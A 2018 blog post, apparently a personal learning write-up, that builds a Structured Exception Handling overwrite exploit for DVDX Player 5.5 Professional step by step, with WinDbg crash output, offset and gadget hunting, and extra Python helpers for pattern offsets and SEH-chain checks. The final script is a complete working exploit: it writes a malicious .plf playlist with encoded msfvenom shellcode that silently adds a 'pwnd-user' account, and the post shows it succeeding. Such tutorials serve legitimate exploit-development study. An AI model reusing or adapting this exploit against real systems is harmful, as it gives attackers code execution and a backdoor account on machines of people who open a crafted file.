Thursday, January 25, 2018

Beginning Windows Exploit Development - Exploiting Structured Exception Handling (SEH)

This series of posts documents my effort to expand my knowledge of Windows exploit development. This post is about understanding how the Structured Exception Handling (SEH) mechanism is abused in order to turn a buffer overflow into code execution.

Before we get started, I must state clearly that this information is based on the guidance provided on the fuzzysecurity.com website, as shown in the references section.

For some folks reading my material may be easier, for others reading the material from Fuzzy Security will be easier. Whichever you choose, please note that this is all based on the guidance provided by those folks and thus nothing here is my original work.

Similar to the FuzzySecurity blog post, we will be using DVDX Player 5.5 Professional.

First up, generate the playlist (".plf") file that allows us to overrun the buffer. The code below helps us to achieve this.

def Exploit_Code():
 malicious_file = 'SecurityNik.plf'
 # 2000 "A"s (0x41): enough to overrun the buffer and reach the SEH record
 myBuffer = 'A' * 2000
 fp = open(malicious_file, 'w')
 fp.write(myBuffer)
 fp.close()

 print(' File {!s} created ... ' .format(malicious_file))


if __name__ == '__main__':
 Exploit_Code()

Once the file is created and fed to DVDX Player with the debugger attached, we get:

(488.164): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=042c0a60 edx=00000042 esi=042c0180 edi=6405362c
eip=41414141 esp=0012f104 ebp=00effd80 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
41414141 ??              ???

From the above we see that EIP has been overwritten with "41414141", which is simply our "A"s (0x41).

If we take a look at "!exchain", we see that both our Next SEH and SE Handler have been overwritten with "41414141":

0:000> !exchain
0012f24c: 41414141
Invalid exception stack at 41414141

Further confirming the above, if we take a look at the Thread Information Block (TIB), we see:

0:000> d fs:[0]
003b:00000000  4c f2 12 00 00 00 13 00-00 80 12 00 00 00 00 00 L...............
003b:00000010  00 1e 00 00 00 00 00 00-00 e0 fd 7f 00 00 00 00 ................
003b:00000020  88 04 00 00 64 01 00 00-00 00 00 00 00 00 00 00 ....d...........
003b:00000030  00 f0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040  60 9c db e1 00 00 00 00-00 00 00 00 00 00 00 00 `...............
003b:00000050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

When we dump the contents of address "0x0012f24c" we get:

0:000> d 0012f24c
0012f24c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f25c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f26c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f27c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f28c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f29c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f2ac  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f2bc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

At this point we see that both the nSEH and the SE Handler have been overwritten.

Next we leverage our trusty "pattern_create.rb" to generate a pattern of 2000 bytes and feed it to the code:

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb --length 2000

and the modified code:

def Exploit_Code():
 malicious_file = 'SecurityNik.plf'
 # 2000-byte cyclic pattern from pattern_create.rb
 myBuffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co'
 fp = open(malicious_file,'w')
 fp.write(myBuffer)
 fp.close()

 print(' File {!s} created ... ' .format(malicious_file))


if __name__ == '__main__':
 Exploit_Code()

When the new file is fed to DVDX we get:

(46c.2a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=03e80a60 edx=00000042 esi=03e80180 edi=6405362c
eip=37694136 esp=0012f104 ebp=00effd80 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
37694136 ??              ???

Looking at the "!exchain" output we get:

0:000> !exchain
0012f24c: 41347541
Invalid exception stack at 33754132


Next we convert "33754132" to ASCII. Remember that WinDbg shows this DWORD as it was read little-endian, so its bytes must be reversed first; the value to look up is therefore "0x32417533".

When this value is fed to WinDbg's ".formats" command, we see the following output:

0:000> .formats 0x32417533
Evaluate expression:
  Hex:     32417533
  Decimal: 843150643
  Octal:   06220272463
  Binary:  00110010 01000001 01110101 00110011
  Chars:   2Au3
  Time:    Thu Sep 19 12:30:43 1996
  Float:   low 1.12607e-008 high 0
  Double:  4.16572e-315

When "2Au3" is fed to Metasploit's "pattern_offset.rb", we get:

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb --length 2000 --query 2Au3
[*] Exact match at offset 608

At this point we can conclude that our Next SEH record is at offset 608. This puts our SE Handler at offset 612, since it sits 4 bytes past the Next SEH.
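The byte-order step and the offset lookup above can be reproduced without Metasploit. The following is an added example (not code from the original post or the FuzzySecurity tutorial): it regenerates the same cyclic pattern that pattern_create.rb produces, reverses the little-endian DWORD that WinDbg printed, and searches the pattern for it; it also goes one step beyond the post by resolving the handler value 0x41347541 from the same !exchain output to offset 612. The 2000-byte length is assumed from the command used above.

```python
import string

# Assumed default: the post generated its pattern with --length 2000.
PATTERN_LENGTH = 2000


def cyclic_pattern(length):
    """Regenerate the pattern_create.rb sequence Aa0Aa1...Aa9Ab0... (one
    upper-case letter, one lower-case letter and one digit per 3-byte unit),
    cut to `length` bytes."""
    units = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                units.append(upper + lower + digit)
                if len(units) * 3 >= length:
                    return "".join(units)[:length]
    return "".join(units)[:length]


def debugger_value_to_ascii(hex_dword):
    """WinDbg prints the overwritten field as a DWORD read little-endian, so
    the bytes sit in memory in the reverse order: 33754132 -> 32 41 75 33 -> '2Au3'."""
    return bytes.fromhex(hex_dword)[::-1].decode("ascii")


def pattern_offset(hex_dword, length=PATTERN_LENGTH):
    """Offset of those four bytes inside the pattern (-1 if they are not in it).
    Works for the handler value on the same !exchain line too: 41347541 -> 612."""
    return cyclic_pattern(length).find(debugger_value_to_ascii(hex_dword))


if __name__ == "__main__":
    for value in ("33754132", "41347541"):
        print(value, debugger_value_to_ascii(value), pattern_offset(value))
```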

Leveraging "findjmp2.exe" to identify a pop pop return sequence, we get:

C:\Program Files\Aviosoft\DVD X Player 5.5 Professional>e:\findjump2.exe EPG.dll  eax | findstr /i pop
0x61625534      pop eax - pop - retbis
0x61629759      pop eax - pop - ret
0x6162E7A6      pop eax - pop - ret
0x6162F5F2      pop eax - pop - ret
0x61632B3B      pop eax - pop - retbis
0x61632DDA      pop eax - pop - ret
0x616339BB      pop eax - pop - retbis
0x616339DD      pop eax - pop - retbis
0x61633F3B      pop eax - pop - retbis
0x616347E5      pop eax - pop - ret
0x616348C9      pop eax - pop - retbis
0x61636E07      pop eax - pop - retbis
0x616384EE      pop eax - pop - retbis
0x61638890      pop eax - pop - ret
0x6163A654      pop eax - pop - ret
0x6163AB3E      pop eax - pop - ret
0x6163B482      pop eax - pop - ret
0x6163B9EE      pop eax - pop - retbis
0x6163E206      pop eax - pop - ret
0x6163E54F      pop eax - pop - retbis
0x61641D08      pop eax - pop - ret
0x61642270      pop eax - pop - retbis
0x61642A8E      pop eax - pop - ret
0x61643B6B      pop eax - pop - ret
0x61643BAD      pop eax - pop - retbis
0x61643CCC      pop eax - pop - retbis
0x61643D73      pop eax - pop - retbis
0x6164526D      pop eax - pop - retbis

We select the entry at "0x61629759" as our SE Handler and can now finalize the code.

Now that we have everything set, we will generate a payload that adds a user to the system. This user will be named "pwnd-user".

Let's first do a "net user" to verify this user does not exist.

C:\>net user

User accounts for \\SECURITYNIK-XP

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
SecurityNik              SUPPORT_388945a0
The command completed successfully.

Time for the final code:


"""
 This code is part of me learning exploit development in a Windows Environment
 Author: Nik Alleyne
 Author Blog: http://securitynik.blogspot.com
 Date: 2018-01-10
 Exploit is for DVDX Player 5.5 Professional

"""


def Exploit_Code():
 malicious_file = 'SecurityNik.plf'

 #root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="net user pwnd-user Password1 /add" --smallest --encoder x86/shikata_ga_nai --bad-chars '\x00\x0A\x0D\x1A' --format c --iterations 1 > msfvenom_add_user.txt

 shellcode = (
  "\xba\x2d\x45\x8d\x97\xd9\xcf\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
  "\x37\x31\x57\x14\x03\x57\x14\x83\xc7\x04\xcf\xb0\x71\x7f\x8d"
  "\x3b\x8a\x80\xf1\xb2\x6f\xb1\x31\xa0\xe4\xe2\x81\xa2\xa9\x0e"
  "\x6a\xe6\x59\x84\x1e\x2f\x6d\x2d\x94\x09\x40\xae\x84\x6a\xc3"
  "\x2c\xd6\xbe\x23\x0c\x19\xb3\x22\x49\x47\x3e\x76\x02\x0c\xed"
  "\x67\x27\x58\x2e\x03\x7b\x4d\x36\xf0\xcc\x6c\x17\xa7\x47\x37"
  "\xb7\x49\x8b\x4c\xfe\x51\xc8\x68\x48\xe9\x3a\x07\x4b\x3b\x73"
  "\xe8\xe0\x02\xbb\x1b\xf8\x43\x7c\xc3\x8f\xbd\x7e\x7e\x88\x79"
  "\xfc\xa4\x1d\x9a\xa6\x2f\x85\x46\x56\xfc\x50\x0c\x54\x49\x16"
  "\x4a\x79\x4c\xfb\xe0\x85\xc5\xfa\x26\x0c\x9d\xd8\xe2\x54\x46"
  "\x40\xb2\x30\x29\x7d\xa4\x9a\x96\xdb\xae\x37\xc3\x51\xed\x5d"
  "\x12\xe7\x8b\x10\x14\xf7\x93\x04\x7c\xc6\x18\xcb\xfb\xd7\xca"
  "\xaf\xf3\x9d\x57\x99\x9b\x7b\x02\x9b\xc6\x7b\xf8\xd8\xfe\xff"
  "\x09\xa1\x05\x1f\x78\xa4\x42\xa7\x90\xd4\xdb\x42\x97\x4b\xdc"
  "\x46\xf9\x0e\x56\x49\x73\xa2\xf3\xfb\x5b\x34\x8c\x95\xff\x99"
  "\x07\x19\x65\x90\xc7\x8d\x04\x27\x74\x59\xa8\xb5\x1e\x94\x16"
  "\x15\xbf\xb2\x32\x69")

 # Buffer layout: 608 bytes of filler up to the Next SEH record, then
 # nSEH = "\xeb\x06\x90\x90" (a short jump forward 6 bytes over the handler address,
 # padded with two NOPs), then the SE Handler = 0x61629759 written little-endian
 # (the pop pop return found in EPG.DLL above), then a 20-byte NOP sled and the shellcode
 myBuffer = 'A' * 608 + '\xeb\x06\x90\x90' + '\x59\x97\x62\x61' + '\x90' * 20 + shellcode
 # Python 2: str is a byte string; binary mode keeps Windows from translating
 # any newline byte inside the raw payload
 fp = open(malicious_file, 'wb')
 fp.write(myBuffer)
 fp.close()

 print(' File {!s} created ... ' .format(malicious_file))


if __name__ == '__main__':
 Exploit_Code()

Once the created file is fed to DVDX Player, the application shows a few errors. However, in the background our user "pwnd-user" was created:


C:\>net user

User accounts for \\SECURITYNIK-XP

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
pwnd-user                SecurityNik              SUPPORT_388945a0
The command completed successfully.


At this point the post could end. However, let's take one last pass to get a better understanding of what transpired.

First up, attach the debugger to DVDX Player, then feed the file to the application. Once it crashes, we get:

(288.7a0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=03f50a60 edx=00000042 esi=03f50180 edi=6405362c
eip=41414141 esp=0012f104 ebp=00effd80 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
41414141 ??              ???


Next up, let's look at the TIB "fs:[0]" to see where the SE Chain starts:

0:000> d fs:[0]
003b:00000000  4c f2 12 00 00 00 13 00-00 80 12 00 00 00 00 00 L...............
003b:00000010  00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 ................
003b:00000020  88 02 00 00 a0 07 00 00-00 00 00 00 00 00 00 00 ................
003b:00000030  00 b0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040  b8 44 da e1 00 00 00 00-00 00 00 00 00 00 00 00 .D..............
003b:00000050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

From the above, we see the chain starts at "0x0012f24c".

Dumping the memory at this location, we get:

0:000> d 0012f24c
0012f24c  eb 06 90 90 59 97 62 61-90 90 90 90 90 90 90 90  ....Y.ba........
0012f25c  90 90 90 90 90 90 90 90-90 90 90 90 ba 2d 45 8d  .............-E.
0012f26c  97 d9 cf d9 74 24 f4 5f-2b c9 b1 37 31 57 14 03  ....t$._+..71W..
0012f27c  57 14 83 c7 04 cf b0 71-7f 8d 3b 8a 80 f1 b2 6f  W......q..;....o
0012f28c  b1 31 a0 e4 e2 81 a2 a9-0e 6a e6 59 84 1e 2f 6d  .1.......j.Y../m
0012f29c  2d 94 09 40 ae 84 6a c3-2c d6 be 23 0c 19 b3 22  -..@..j.,..#..."
0012f2ac  49 47 3e 76 02 0c ed 67-27 58 2e 03 7b 4d 36 f0  IG>v...g'X..{M6.
0012f2bc  cc 6c 17 a7 47 37 b7 49-8b 4c fe 51 c8 68 48 e9  .l..G7.I.L.Q.hH.

From the above we see our Next SEH overwritten with "0x909006eb", followed by our SE Handler overwritten with "0x61629759". Next come our NOPs (0x90), followed by our shellcode.

We can also verify that Next SEH and SE Handler have been overwritten by leveraging the "!exchain" extension, as shown below:

0:000> !exchain
0012f24c: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll - 
EPG!Ordinal1+23919 (61629759)
Invalid exception stack at 909006eb
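The manual walk above (fs:[0] to 0x0012f24c, then the nSEH and handler fields) is the kind of check worth automating for crash triage. This added example is not part of the original post: it parses WinDbg "d" output copied from above (the TIB line and the first two stack lines are embedded as constructed input), reads the chain head and the stack bounds from the TIB (+0 ExceptionList, +4 StackBase, +8 StackLimit), and reports a corrupted record whenever the next pointer is not a higher stack address or the handler points into the stack. It also decodes an nSEH that starts with 0xEB as the short jump the final buffer uses; the NT_TIB offsets and the jmp rel8 encoding are standard x86/Windows facts, not taken from the post.

```python
import re

# Constructed input: the "d fs:[0]" line and the first "d 0012f24c" lines copied
# from the final crash above; the prompt line shows that non-dump lines are skipped.
TIB_DUMP = "003b:00000000  4c f2 12 00 00 00 13 00-00 80 12 00 00 00 00 00 L..............."
STACK_DUMP = """0:000> d 0012f24c
0012f24c  eb 06 90 90 59 97 62 61-90 90 90 90 90 90 90 90  ....Y.ba........
0012f25c  90 90 90 90 90 90 90 90-90 90 90 90 ba 2d 45 8d  .............-E."""

# an address (optionally prefixed by a segment selector) followed by 16 hex bytes
DUMP_LINE = re.compile(r"^(?:[0-9a-f]{4}:)?([0-9a-f]{8})\s+((?:[0-9a-f]{2}[ -]){15}[0-9a-f]{2})")


def parse_dump(text):
    """Map each byte address covered by WinDbg 'd' output to its value."""
    mem = {}
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if m:
            base = int(m.group(1), 16)
            for i, b in enumerate(bytes.fromhex(m.group(2).replace("-", " "))):
                mem[base + i] = b
    return mem


def dword(mem, addr):
    """Little-endian 32-bit read; raises KeyError if the dump does not cover addr."""
    return int.from_bytes(bytes(mem[addr + i] for i in range(4)), "little")


def walk_seh(tib_text, stack_text):
    """Follow fs:[0] to the first _EXCEPTION_REGISTRATION_RECORD and sanity-check it.
    NT_TIB layout: +0 ExceptionList, +4 StackBase, +8 StackLimit."""
    tib, stack = parse_dump(tib_text), parse_dump(stack_text)
    head, stack_base, stack_limit = dword(tib, 0), dword(tib, 4), dword(tib, 8)
    nseh, handler = dword(stack, head), dword(stack, head + 4)

    def on_stack(a):
        return stack_limit <= a < stack_base

    findings = []
    # an intact chain links to a higher stack address or ends with 0xFFFFFFFF
    if not (nseh == 0xFFFFFFFF or (on_stack(nseh) and nseh > head)):
        findings.append("next record 0x%08x is not a higher stack address" % nseh)
    if on_stack(handler):
        findings.append("handler 0x%08x points into the stack" % handler)
    raw = nseh.to_bytes(4, "little")
    if raw[0] == 0xEB:  # jmp rel8: what executes once pop/pop/ret returns onto nSEH
        rel = int.from_bytes(raw[1:2], "little", signed=True)
        findings.append("nSEH decodes as jmp short to 0x%08x" % (head + 2 + rel))
    return {"head": head, "nseh": nseh, "handler": handler, "findings": findings}
```

Run against the first crash dump (both fields 0x41414141) the same function reports the chain as corrupted but finds no jump, which is exactly the difference between the probing run and the final buffer.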

That's it for this post.


References:
https://www.fuzzysecurity.com/tutorials/expDev/3.html
